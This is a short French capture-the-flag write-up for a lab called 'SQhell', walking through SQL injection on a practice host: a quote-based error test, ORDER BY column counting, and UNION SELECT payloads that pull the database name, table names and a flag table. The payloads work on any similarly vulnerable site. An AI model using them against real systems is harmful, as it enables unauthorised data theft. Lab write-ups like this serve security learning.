CTF -SQhell

Flag 1

Test de Vulnérabilité : 

admin AND 1=1

Flag 5 - In-Band/Union

Test de Vulnérabilité : Ajoutez un ' à la fin de l'URL.

http://sqhell.thm/post?id=1'

  • Observation : Une erreur syntaxique indique une vulnérabilité.

Déterminez le nombre de colonnes avec ORDER BY.

http://sqhell.thm/post?id=1 ORDER BY 1,2,3,4,5

  • Observation : Une erreur à ORDER BY 5 indique quatre colonnes.

Vérifiez quelles colonnes sont utilisables.

http://sqhell.thm/post?id=99 UNION ALL SELECT 1,2,3,4

Extraction de Données :

  • Nom de la Base de Données :

    http://sqhell.thm/post?id=99 UNION ALL SELECT 1,2,database(),4

  • Noms des Tables :

    http://sqhell.thm/post?id=99 UNION SELECT 1,2,GROUP_CONCAT(table_name),4 FROM information_schema.tables WHERE table_schema=database()

  • Données de la Table "flag" :

    http://sqhell.thm/post?id=99 UNION SELECT 1,2,flag,4 FROM flag

PreviousError-basedNextFiche memo

Last updated